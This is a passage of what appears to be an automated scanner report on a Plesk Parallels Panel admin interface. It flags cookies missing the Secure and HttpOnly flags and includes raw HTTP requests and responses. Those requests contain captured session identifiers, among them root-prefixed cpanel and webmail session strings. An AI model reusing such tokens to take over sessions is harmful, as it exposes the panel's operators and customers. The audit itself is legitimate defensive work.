GET /plesk/reseller@3/report/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:30:16 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: reseller_report__report_id=2 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:30:16 GMT Server: sw-cp-server Content-Length: 15748
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.58. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/report/layout@2/auto@/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/report/layout@2/auto@/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/ Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:30:21 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:30:21 GMT Server: sw-cp-server Content-Length: 9967
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/report/layout@2/auto@1/properties/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 15:30:34 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:30:35 GMT Server: sw-cp-server Content-Length: 8161
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/report/layout@2/auto@2/properties/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/ Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; reportautolist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 15:30:34 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:30:34 GMT Server: sw-cp-server Content-Length: 8192
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
4.61. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@new/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/plesk/reseller@3/report/layout@2/auto@new/
Issue detail
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/report/layout@2/auto@new/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; reseller_report__report_id=2; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True; backuplocalrepositorylist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjEyOiJkYXRlX3JldmVyc2UiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; custombuttonslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9
Response
HTTP/1.1 200 OK Connection: close Last-Modified: Sat, 24 Sep 2011 15:30:25 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:30:25 GMT Server: sw-cp-server Content-Length: 9935
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the secure flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /plesk/reseller@3/report/layout@2/auto@new/properties/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/plesk/reseller@3/report/layout@2/auto@/ Cookie: reseller_report__report_id=2; locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=tools
Response
HTTP/1.1 200 OK Last-Modified: Sat, 24 Sep 2011 15:30:25 GMT Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=utf-8 Set-Cookie: psaContext=tools; path=/ Date: Sat, 24 Sep 2011 15:30:25 GMT Server: sw-cp-server Content-Length: 8336
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.
Issue remediation
There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.
You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.
5.1. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3previousnext
Summary
Severity:
Low
Confidence:
Firm
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/login_up.php3
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
POST /login_up.php3 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive Content-Length: 55 Cache-Control: max-age=0 Origin: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Content-Type: application/x-www-form-urlencoded Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/login_up.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
5.2. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/app/usagepreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/app/usage
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=tools; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/app/usage HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/reseller/tools/id/3/?context=reseller-tools Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=reseller-tools
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:27:17 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:27:17 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=tools; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:27:17 GMT Server: sw-cp-server Content-Length: 8399
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.3. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/edit/id/5previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/edit/id/5
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer-service-plan/edit/id/5 HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list?context=service-plans Cookie: locale=en-US; PHPSESSID=e3ad4a00f2610cf68740be8917e0c8b4; psaContext=service-plans; BarExpanded=True
Response
HTTP/1.1 200 OK Expires: Mon, 24 Oct 2011 15:55:07 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 15:55:10 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=service-plans; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 15:55:12 GMT Server: sw-cp-server Content-Length: 160630
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.4. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/list
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer-service-plan/list?context=service-plans HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/left.php3 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=57d66da046ef93a23dcf11ba6b76368e; locale=en-US; BarExpanded=True; psaContext=customers
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 19:12:54 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 19:12:54 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=service-plans; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 19:12:55 GMT Server: sw-cp-server Content-Length: 13086
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.5. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/list/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer-service-plan/list/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=service-plans; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:00 GMT Server: sw-cp-server Content-Length: 10515
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.6. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer-service-plan/list/reset-search/previousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer-service-plan/list/reset-search/
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=service-plans; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer-service-plan/list/reset-search/ HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: cprelogin=no; langedit=; lang=; roundcube_sessid=expired; Horde=expired; imp_key=expired; key=expired; SQMSESSID=expired; logintheme=cpanel; webmailrelogin=no; webmailsession=root5310584956128848429879209606159666272944454576758818798974260921; cpsession=root2913896429156050539354257383383063516994846067651908757237876817; locale=en-US; no_frames=deleted; no_frames_root_page=deleted; no_frames_login_page=deleted; no_frames_logout_page=deleted; admin_report__report_id=2; PHPSESSID=650d277c6582dd6296b0d447081dc10c; reseller_report__report_id=2; psaContext=reseller-tools; ASP.NET_SessionId=1ab5pcr5culiydam0oy4wt55; __utmb=1.1.10.1316735250; __utmc=1; didgettingstarted=1; __utma=1.1076947848.1310133308.1310133308.1310133308.1; __utmz=1.1310133308.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); whoson=462-1310133309230; BarExpanded=True
Response
HTTP/1.1 200 OK Connection: close Expires: Mon, 24 Oct 2011 14:16:00 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Sat, 24 Sep 2011 14:16:00 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=service-plans; path=/ Content-type: text/html Date: Sat, 24 Sep 2011 14:16:00 GMT Server: sw-cp-server Content-Length: 10515
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.7. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/createpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/create
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /admin/customer/create HTTP/1.1 Host: Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/list?context=customers Cookie: PHPSESSID=b2a41b1ec192804dab9cb46ad8c6714e; locale=en-US; psaContext=customers
Response
HTTP/1.1 200 OK Expires: Sun, 23 Oct 2011 18:57:57 GMT Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: max-age=2592000 Cache-Control: post-check=0, pre-check=0 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Last-Modified: Fri, 23 Sep 2011 18:57:58 GMT P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA" Pragma: no-cache Set-Cookie: psaContext=customers; path=/ Content-type: text/html Date: Fri, 23 Sep 2011 18:57:58 GMT Server: sw-cp-server Content-Length: 46021
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]...
5.8. https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443/admin/customer/listpreviousnext
Summary
Severity:
Information
Confidence:
Certain
Host:
https://Plesk Parallels Panel Version psa v10.2.0_build1011110331.18 os_RedHat el6:8443
Path:
/admin/customer/list
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:
psaContext=customers; path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
